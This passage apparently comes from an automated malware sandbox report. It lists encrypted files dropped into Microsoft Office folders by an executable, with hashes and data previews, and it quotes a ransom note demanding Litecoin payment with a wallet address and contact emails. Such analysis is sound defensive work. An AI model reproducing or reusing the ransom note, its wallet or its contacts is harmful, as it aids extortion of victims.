                                                                                                                                                                                                                                                Preview:#L.@.W.>..4_uv....O...D.. .}J^......?$rQ.s...e..........aso.L..9JW..:L..0..............=<.........E?.....m..Ks..E!V.BJ..`..4../....z..o.".L.j..5A8xBqb....X...A..-..B..v...7....)..h.0AD.K....8!r0B.@S..fEK.....<...<)(...$....n..a.l.J.p}.b7.Ri.m...u......ge...U.~./.`G;..'4....s ..F.i....Y.z..X.s..d.h(.FE.2......'9b...\c....h....Qp.....z...|..35.f8c..2H..|.7..O....!.>!9.!.:....$T.Q8....e{..,.....&..G.6......?i.......:.0k....g.<S.g.S..GX..............N.h.....K;..`F....n.?..K.Li-.3FD~..[.D..^ru........X..h..Q..._.-.\......._;./.0/.>....T.%%.....'`...1.{......ed.A....M.../.3..0I.'.=.T....X..n...H............S.+.v.O\x.}3G.O.C.....;8..^.\....T.Q.v...........(.....i.a.v......M..j..K.0."q.(..@....( ...ay.8..T...N.3l........ ....#..F..J....AZ?..|...}\.7U.En0i.....(.n..t%C;. .k1u`_af.3....=......w2........6..8.Q.......z... ...." FTg.....U...!..'..cT.B$.ig`....o. ^.......%4ed..;.f..[.....V.d.j.LU..."E..XJ~.g.....8W.."...u7.6.._.*...!].

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-00E2-0000-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3620
                                                                                                                                                                                                                                                Entropy (8bit):7.945608189510525
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:rPSsvTUkIw3RGh7r+OYpnj1BnpLy9hJ+r8rKleO:rPSsvRIUG4OgnpLyDJ+r8uUO
                                                                                                                                                                                                                                                MD5:AB715245D748528E06019603F5BBEBFA
                                                                                                                                                                                                                                                SHA1:C884C5607DA7453DB21D685C461EDEBEB5C72CE5
                                                                                                                                                                                                                                                SHA-256:CDFA2A92EBC85CAC34BB307D99787384ABD56096FCDC28ED241AC2C2296122B7
                                                                                                                                                                                                                                                SHA-512:885AC9BF8D3EF29BD2689711C1ABEF8B0AA2987114E6C5D63E3DB287EF2917626784F4BDA40FEF5B52C6C122E53940FE85AB02FF9DB2BD77BA46B9CE93109F30
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:5..c5Z.W^..y.%.d.m..c.k.d.........E.j.q=..o]I.Q..!..9}....!.T\.E...A.i@)...u.\.{..m.9C..sW..`....~t&..{j-.pt.1.2.kl..#..C......J..y...[W..B.X.V.....*...&.$.\.x`#4."j...Q;.i4.cE.cB.[h....6.......|%.D...4....w....?.c..y..v0.......$s........>......A.~].'..'?..B.u..YK.....p......m\....-Y ...!..O..i|f.r..(.n.6.y.<.V.XM..Jk........RK)R9..!<...k..M^..R..\.I0.!.<Z.~..u..f.._..N0.E..j..,.M.......M..).WI;.......o........a...&..'x?...{.H...a.H...K.F4..F.1-.".j..R.H..i`..&.......o...7z..6yr......>L.~*.f.....d.)..z.*.&.puw.....lV.C9+...^Z........]6w..xA......:.."...Q...+.........2.P..A(D.<..7(.JxM.*....5...[_o.8...M..7.....!Yc..~.o.{..U.|...O.Hk@.E[..h....=.....`^..$Z.y. c..H[..%.W..k`..6..@$sK.7-.".r."...,.F'w......2....i...?.(.x...yh.....i....|_.#....$dhK....T..'.W...0.V.-.....w..Zc>K....!....S......@;.=.f$i..A3.*.(....f.....j...p...{......g..obu^..K!.L.-.7z...{..U ..|...wN.J...../A..x.2A..CK..#....u@\..n..._...%...tX..\......7<b.....:.y....=.

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-00E2-0409-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1900
                                                                                                                                                                                                                                                Entropy (8bit):7.900144014406995
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:QyVOtQO6n/pLr0mlhEgQoVoxpkXv4XwU06Y74o0jZtwv5:QyVOtr6n/pMkhENo3IKMleR
                                                                                                                                                                                                                                                MD5:394E365678D6DC9A5896C9EF87E3805A
                                                                                                                                                                                                                                                SHA1:48F7B6C0C495F6DC073837228FA58AED73F05192
                                                                                                                                                                                                                                                SHA-256:F77BCD41ED343E3B6D5B8FC4F9365EF0A43982739D97B1B976910EF65B32126E
                                                                                                                                                                                                                                                SHA-512:85C99DDAF42F504DC7E81050ED87295CC82C5628047F7B4F6E83641FAF43F2151D2C18AB2BB43918D5B7C81F2497B3A43D51E445740622FCF9FA4D2FFB21C8E5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:3..x.......#W-.*SO........u.oO/...k%..6..,.,.o....y.mV...}...}....w.O.M&..>....]._.B`...n*.T.G3T.P3.n.Z..f...`{,_9..2j.B..-....q.Nw.......vP:..*..?Zj..?.O.ip...Y.............D..z./&`........|...XrEA{...".S].j.OK9..Cl.......T.R..&.-I..e..iY}.Q*....2K.S.........R.h....t..H..nH4...:|.g...z+..0-.x3v........;......I........h'...........S.;>@9...9.R./.<.U?.z|."r..u$.......N...r...h.:-..L......n%..!"iyj..h...:S........)...vbX.......:\T.......x..<k.9=...D....aXn.L.X......d09Q.@..4..>..%Si.....w......./>.(,....B.:3...qAq..Aw,......fYF.V=..i..5....iO.....#....&eZ.?[NR..^}.......8.._...'...\$.-.$/.....7.....2. ., q....T......@e.7.G.O.pp.e..e..<...B....~.$..{tk\&...2s[^..Os.g...4<.....p]....5..e.k^..0...K.:4.<{P.3.. ..YO./......X.Jz(.....$X]../.t....t S.08QI|.rH..5.".....+.....3G.,.T.......K.i..\:.F......P.|.k..x...!7.....a. u".....^.@!.+.!..r.....a?.j.,.<ytNc#.j|....,.[.]~D.e.a$...Ex..@....(..+&< .CT5.p..9.......e.u6[Y..6...J.._..`jq.&<.w.V.;...gB.%'

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-012A-0000-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):552165
                                                                                                                                                                                                                                                Entropy (8bit):7.050427671197534
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:OhlHJt71ecuS59CUgJF4h82gqtdU7QeRi5cB1YgAMFnwNS7:6HvAcuY9+Fd87QRiceUOm
                                                                                                                                                                                                                                                MD5:93ACD54270EB53CE14D70F65811ECF39
                                                                                                                                                                                                                                                SHA1:57AF9A3D4DB838B024E48C4F41EAD60F6AADAAEB
                                                                                                                                                                                                                                                SHA-256:B8AE824DD08EB3DB4D7ED57D61F92ECF56940881084C1EAAB7ED8BE83ACC561A
                                                                                                                                                                                                                                                SHA-512:6F81F1F6CA4432AAE2680A9D78BF53C41007E82ACE17762E7A3A5B3AB010FF6C58162AD3098A0CF4663F9DD514D9F329AD2BDD27E9BFD6FFEE272022AA7A78CE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...<t..(2.......:.h..oH........%.y..z.j..EP..mr...m.R....[6:k.S.[3.6...|..y%..s0Ax...3.8S0#J.{....G./..J....\.kB...N.S5.,\....7'...%f.. I...v.H!.5..`3......2D..^T......e^k{...%.L.G(.PH..."L..%.G..5..T%.../..~(79%.%..w........Q.. .!."p......E...FG...r.a.....N...<....O.K..d..+%.L..}....3V._..'.W.>....!(.9...PV...y.8.(.&......d...}..C.8\.f.....I.u[..?.].{..r>.P..'..b&.Y.C{p...w.....H....~....j..V.;4b...Y...W%.a3m[.....'.DW...I0^t\;......7.6.....xo.Oc....H..(..7...dn..."..j~.7...L..?...t.?/...J....c.Sgq.G.U..U....D.3.9.V.s:"..3.z.8...eGq..r.dh!%...W.k..IO..^o.....i.%.hA!..F......NlS..KbL.vM.r..p.".....a.(...2Z...,...m..*..[.-H.....,.;.y.z..D...S%.t..S....vZ.._.z"..6[.r<~......k....q;`..,.^.vt..3..c_..+Y.(....O.....C\.>..c6...>.x........@].v...E...`.....h.'..}.!t..,.rm.Db.....^.JO.}......Z:;9@...........e.! b.ZV..@\....i...........(....0{.le.~,...m...~X.-.a.y..Z....f.S....2..*...ZK.@%..."....P5r..<.?...y..0....K..8n.S.dl.U+0B..]W......egd#.....F..1.

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-012B-0409-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1996
                                                                                                                                                                                                                                                Entropy (8bit):7.893911967394004
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:mW4IUC7rShab+iuYct4HKVkPy3TV8esveAr7losOi/BlwYMvPuqv7mjmJrc0YXUr:mBCXSAalIVAJylos1pCP744o0jZtwdSJ
                                                                                                                                                                                                                                                MD5:57667DEA16EA4032BFCEF072E9169CB2
                                                                                                                                                                                                                                                SHA1:3F825102F9179D9730BD261EFD6C799646E90E83
                                                                                                                                                                                                                                                SHA-256:A2BFBF967EFC7DA8F36F44D76CA47A1780A3F5895ECEBC339027199E178ED659
                                                                                                                                                                                                                                                SHA-512:5E080EEA444210D56E7525AD2D078B951F4238F95B6171DD492A321AEDB22FEC7BC64A77866643A880E8554B4C9B2BE6B0EBAA1B0844F18F1CCA8C66ACE3CE53
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:g..;.k]*....W...\.2.@7...@..tCh....J..........f..p~.....:.P6`....{..........u.k........-....9.....o......J.Fv#_...0...=$.P..>V...;+....q...hW..i.T.(D1.FP....A.....6..cu..5..&O/S4..(.w....u..?.c...T...........N.#*.s...M.Z.+...o-..p....0-/.43....v.M....~.D...Pm..k4..YG.O_..+......P=.h...]..Ju.?..o....../.....Fw,.Y...*A..+{.,....L..=]...*l...V...4n...-Z.P....rmU..ep..*.7...!X]...6.O..X.I.4.&,.=..0F.U.Yo..0=..aT.r.r...D.^S..?....,...=....Fe6+....v<DQ.x.......:....:..O$v..=..d:J..#......Cn.X}.f&..Ij.P..eg...6U..vL....T......>.Zs............`.....~..e....k6^.. g0.1<..\....VVU.[-.86...!...........v...|mM....5F9C'.o.....|....sh..g./....$AU.\.h....g.[...B...3.f.......,.m......S....i5.^..L%i.......]...../.^.(e......_1So.~".X9].9..[t.V.q..hi........U!......3B@.%.u7..?IK.G#.v.H.")...Y..P"..Lt,d...y.....'.............e....2..\..~..>...k.!.VS.).d............7..6\.lY.LyEr..X..\w...%.H&j..l-.3..#.c...^.........|..bOIy...Z..[...a%..}$...%#.^L..I...7..F$

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-3101-0000-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2809
                                                                                                                                                                                                                                                Entropy (8bit):7.938853200234973
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:d/WtMhIwf7SIaJgwhVSLCkGGzrNKQqF0earqPR2r5cWG/04aeQ4o0jZtwDYk:FSwTSTCooLCxYrNLu0earqZV/0Rehlen
                                                                                                                                                                                                                                                MD5:884F5DFA5BCDB684C5715008F97B3159
                                                                                                                                                                                                                                                SHA1:8C334467C99A6C0CD1BB406D7219FAAB616C1A61
                                                                                                                                                                                                                                                SHA-256:7B41B1D16DD5E89D5141E53782DFDA3A947B185768C8633C4E56409B5A5AC6F9
                                                                                                                                                                                                                                                SHA-512:507FE2BEC4E48C5434090AA0AF68DF1F827AE4421BB2A64279CFDE36335BBE326839C5C178D826CD7F9D7D8E26636D76E45CF30A553F61DB49DB02F3EC8655CA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:........s>.0uL..a....Uv.........;........j..9.wT...).....HPM.%Y4.gePq.B'..<..><".GV.....1....f.<.E.N...&..............D...@_..I.0..q.8.....#67....P....&:.W./5P..].d.G..F[u.0...vR...2/...X[..*.<G..`...!=..1...y.....]<.,.@@.A....0n..~>.a.Cs..Q].dr..M3/g.qpxb.o ...0.>@}.....n D..y.'.O.s....>.....0k=.7e.].z.@......_'.z......9/..$.=r:.}.K..MAO(.F.}R..b...4.#.H.$.-.>.$N(p.-..m...=V.._q.'.5......'....-Q...........A.."....nu...lV...*. ... ........E.x./...!..W..U_.82..v.............M.B7 ...vX.......?X2....Q..=...0"...`Gh6...I^...l...Sn..0...!...X...r.N../..s..5."l..;...GI....9..2c1....2...;.LX.9......h+...(V...z...`2.!_ ....8Q.T.:....|...f..+Aj`N...c.(X..i.ya....C.....mWo.<.@....C....x.(j-..-.",4+w.U6@fe.5pux....\..>..D......L.....'.".....7-).i.....'.A..iB`..4?...b......]..*.7M..c.(S.a.>d.d..<o.... ...-.G.i.4.&..m.s9Us..}..&.-.B.[.}d...f....BZN.SI5.*%$...".H..Q...)...q.O....g..l..c[.M.B;.8.Q.<O..|...>J.t....?.9..S.........Q._...]. 3.*4.U4....O..

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-3102-0000-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3734
                                                                                                                                                                                                                                                Entropy (8bit):7.9533990450533265
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:DVEr6OJtDBGjK1EevEaI4nU6WCY+CFJogR56leK:D0ZPBGj8EevEaI4nU60+Vk6UK
                                                                                                                                                                                                                                                MD5:CCED7B2541809414867622E51142B4F0
                                                                                                                                                                                                                                                SHA1:37777389610013CB83E73D29E5C1D64A15140A62
                                                                                                                                                                                                                                                SHA-256:053E033AB2B577D2698031DBB098DA6AFE5ACCBDD8F1B2A0B1A084ED9BF9CB96
                                                                                                                                                                                                                                                SHA-512:27D128912EC9F3C24976C4D4A1839C449696379E32075FC7F05E6090A6ECB2BCB64917CFEC577B99295CAAA4B9616E319B9DF6A998B62BD560281B9CFE9F187E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.-d.]..asV.?*Z.K..#....../..3n.q.7.52..D..}...XbN.a.z...=w.9?,........L.4M._;...Ev....y+l.].....>..c.....*....&@..2......x.V...Md..;(.4.sX....H....H...%......3<+.c.|.....3....}........j..Lc....N..aP.:.f.4..,;.I.(s;.xUV..I..tHV...&.c........b..Ao.Tb.B....A@...8Q......d4..L+........&%,&$...}Cm.e.v..8..7........S.h2Q..R....rL^.P.z....H...6.\+!.f.O.W.z.).UD..`UG.:.4)...9R...j...I..M.+g\.......p..6s.o...:..2$.wd.|..".hF..!u.{...Uz..`.6DCv./..K..+.&.G.e...+....._G.mZ..0m...UF.|......! w&K:...{Xw.T.~.t?....'..@S....W.=..M.v52..z.....!.I.H........t..sx..Yv...z7^.5d.?..cT(..<...FY.h.....)#..3.Bft;.....I....l<.:...u....2.W..wO.*.Y......"o".<.6*.`[+om.yvG... .t...<...%].Z.i...Z...'.Z.o..Tn...-...f6.(.:.0x...G.~D/..w#...x.R/.'U.....Ysm..~...i...N...~.....e9...4=#{Q....$...)xhQ".\..e...<..E.7......C.........).K...*L......k.l#|...9..........CP?xt~*.............@..^......m... .kY_..l-..9P..1..%..S..y.~.".=.%.......\p.W...llA.._aF.:.<i.....F..w('HJ._

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.common.16.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2015514
                                                                                                                                                                                                                                                Entropy (8bit):4.909792042715636
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:ZHLOwqQzVtGy1wVRGKYQMDrvdfodZji6wR2kOZS:ly7QzU7JYkji6OfuS
                                                                                                                                                                                                                                                MD5:04058E6773BBF4738CE71EEF7103E996
                                                                                                                                                                                                                                                SHA1:ED35C480AD5C98A0A7EA82F05FDD8D284F496340
                                                                                                                                                                                                                                                SHA-256:8A42F39CFD85ED66D956251BFFFBF1F43F2555EFFAA3C15BE3F761B21037AF45
                                                                                                                                                                                                                                                SHA-512:28FACBA41E0B6FF8D1A730588D459BB375C14B8A7183087DB5875F783FF1AA40FF4552703B9196E8545D4142AB09F6B2AEAADE2901D6E64EEF8B98D1506AA2EC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.^.....i.a!M..;.yM C..b....[|O;...,v.-...{....\..$QH..A..."..:l....@6...-.s9.~.1.............kG...2T.|`7!..Qe....+cbS:9..D....Q......-....,.7.2H1.[....-..>. A.q'o...{..T..E...K.so..FN.S.....x.i.y.*..m/..!`@o_...>.....5...c...J....hQ..zY...@.q..1..Ju.7.r....cC.H.|.;I....B..Cp-....V2.......b.l..tm.2.L..>!.?.3.N.R.N]._..zyI....8......M..~<.=..z[..... .{...k).%C...J......Z.+.+B....x.A.......S.JS..U.3L..&J..z.<9.dRC.g$...R`.*Q.{P5.'04..I..K.1:.by......o...........%.nZ:7.....].T.).bV.....#.E..)N4I../U...+w..a.6,bCn...8.M}...|7:...m.......D..m,..)..h .-...4q..@>..IS........0.N...C.y...1O>\u....q=L..\.y..z....e..7Cx..s.OU.u..bX.G..}..b..v.w......Z.{...~...pG....,%.....`X...6......T.>...'..C.G4....YZ...v`..Y\m.7..`i...C.d.&.4.0Y~.:f.aE....j../.bZ......W)n..1.M....f....t}t<..ZZ....=`....m..d..[..}.%...~.3..S......9t4T..6nE..7...=o....9h....a.9&.`.P...$..7!..!C..W.6..X.f...]..5.+...?*.r.Dd.FW.|.....my...YIkTh`F.........P-....x.6q.EK.....2V?.-.v......c.uy.

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifestLoc.16.en-us.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9698
                                                                                                                                                                                                                                                Entropy (8bit):7.979349240414599
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:MciInXFBlMk/plQ8Tg50MnCTK3pD1URJE5ullWgUH:MUhhlQ8Tg6pK3k9HWXH
                                                                                                                                                                                                                                                MD5:2F0C195F67F94D300064049B351BEB1F
                                                                                                                                                                                                                                                SHA1:907A0F9886C3B9E12EE7ECE542F34055915FD7F3
                                                                                                                                                                                                                                                SHA-256:253E00DB3B3863D201949320D96DE957D341034D014C038E92C4B27C8B24DE61
                                                                                                                                                                                                                                                SHA-512:3FDBC93BCA92DEC3C27BEDE96CE4A4A2B056EB8728FA5094306C69CA394A80FCC51371DD9A80859F420DFDAFE2CB08BC927F8FE9C9E5215F7CAE736357F14EDD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.1..ym..p..x.....:..H.^.;.X.i*.k_t.a$..]IE..0..B.......m..?.t@.....y/..@..9.H@.u=.....Xg~.~..1N..#.52.....PjL..f..G.d.-h..D..........S.C....).7.....O>z...X.7.X3.lz.\.........Gr.u(L.m.......b....n^.d.>........j'B.....#31s....G#.......?..........v.EU.L....I..O.....2.:..cx.ae;...+.....".Ib.\..o..S...g*<...}L......W<..bq(f......U.M"....z..r.rA*.g.....ad:*+....Sy4.P*......G............Z..U.8.r-.. ..za..Y.(.r....p...!b..4.........Y.\...^..(.i..Yv2.N.6.}ck.R.a.3..s.dWfav.p....?..eA3.....t..h...#.%.."+..j.p.......L.r.....<...|..n..w(.-.n.....L..`.sX.........o..........X.P..C..9..4.]X.:...q.n..@......(...%.RO..w.`)...Jc.Oc..q.i.>..".|\.{..J..F.....;.]..`Q.. q.-...J.a,.".cst...HW.\.@_...4..8....<Kz.]:{-O..i.S...cu._Z..c.:..hmb,.rSrr..0.Hm.......KK....5.a[....\..S............a;-..$T..*vM..5e.Q.{...Ts;cC.62b.&.....|\s..5...H..S..hm...!<X_.8...(.s.8ZJ..5..].F..b.p8...0d"/y.#/"Z...aG...!..........^. Z..[.Ga.(.z.c>...^.5c..f}...o.1..>=..nz0.......

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AuthoredExtensions.16.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):981
                                                                                                                                                                                                                                                Entropy (8bit):7.7834319891850825
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:WZc7YBacMibX+V2eKKU6PYZ7w0LLGX2jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJuy:csW3b9wU6+UU5jmJrc0YXUZtwsT/rqxs
                                                                                                                                                                                                                                                MD5:A3BF590FA231B80622D916C20CC9D0C6
                                                                                                                                                                                                                                                SHA1:7EC8DADD4F6C30F9A92FC380DA3DD25A6EA14DAE
                                                                                                                                                                                                                                                SHA-256:3891D71398191720561C82B12E659E4DF5051E28DBB32B4418ED8539319B13D5
                                                                                                                                                                                                                                                SHA-512:1A585CB759DD94962C0FF9E5F43414EB60AE37952A7DB3CE87E9C7A3C580B130ABFAB63777E2AFAEB4FEA5537F7D47045807289D6B4F43BE67E7FB9EC9FB90F6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....%R8...h.]x.!i.&....EO..@.c.-...W\LL.0.[.j.G.R..[@+$M.'..L... .HFv|/B.f..Pl.,...6.N.....%.R.E0......I. |...Q.n-.....h...mR..P./!'&.1{\h..E...]<...?Z.F..l&4|....Z'.n7y...^.Q..._............b......j.T'#..&$w..d....4&<.O..s*V.v.'e.W{.2}m9....N+b..)!.&.-.ZE...Z..%;..[...<j4X.y.e.j.jl.]..sA D.6.).l......>...X3...b.....V.I.... ...R...C...."......G.bK....n.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$....z.='...W...4...U.x^.U....vG*.L.].u...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\ThinAppXManifest.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):5219
                                                                                                                                                                                                                                                Entropy (8bit):7.957742910009899
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:8fr5qkcPTtJUVX/64yBh8cKNFtYaMocyjglkcfeeN7uRvZ5IPAO2LuleSc:8VUP56X+xKNr7RXfWN7YRFOdUN
                                                                                                                                                                                                                                                MD5:EFE91DEBF1912903BEC0E84807BBB904
                                                                                                                                                                                                                                                SHA1:2BB10E23C7C61D91F9B0412026B0C4F732710E72
                                                                                                                                                                                                                                                SHA-256:41BAF541883BBFEB5CBC3670CA1721F32C62AB2444D53C6188812C4A95CE61F1
                                                                                                                                                                                                                                                SHA-512:E14EBFE048D5BACD17DB67A69A376C9EFCAE577938D9B735B7F072601FA6FA060A9F451FBD0039F3C33B09903375F1D71B4ADF62D911B16704423220BF774EB6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:h.[[.c'.;..X..nC.3.......l*.$.j.4Fv.....{....7.J..**...B{........%..9....K..Z,.S<.._...B`..\9uu|.MS.O..W]a.>..G5.j*...WQ].,.b.|..v.k.O.5.F.S....]l.=(.wCk...yN....Ep..+/W..]8..!.A.D.Q...m_F~...*..S.Z...&..K.}..*.......u.A.g..B...X.E:q..*........9-G.,....8,G......>'.....^.?^!.K........J..x....w......A...+..s....b..=Wy.....7.q..v.g....7...K....|gT.';L5..I.)/O...g"k.......qZ..GT.....?_g........F..M.co....y./9M..)<q.E^o.k.@..$.z8C.....j.@.....Q...w.....}A.........=.b=..i.c.RW.rQ....p....I....Tr).P\f?....m..n`=CG..g..O.............C..L$.<....&..(/7..nn{... o.r..4?.n'.U.p....`.....s"~.g...R..n......o........S.../.6.....i.&...F.........).8.~..U.....;2.4.V7.H.....8p.y.{.gg.WV.i7Q>...1...q.LJ#b`..u.x..V9......x.*..Qe....>tT.`w&.....2.:.s.3.......3..1..y7.N..JNcm.<.k.[..8A4CK.F...%.[.Z.......).(.9.R._\..}.^...5._pq.A{G.x.@._.....oE......k...`...ON....^...g.K.Br.{...(j..W......b.L'..^...P.)..E..L......@.Z8V-..\....H..2b4....E%.....0....AQ|Mh.......U.rq^x..

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\Updates\Apply\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\Updates\ConfigFolders\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
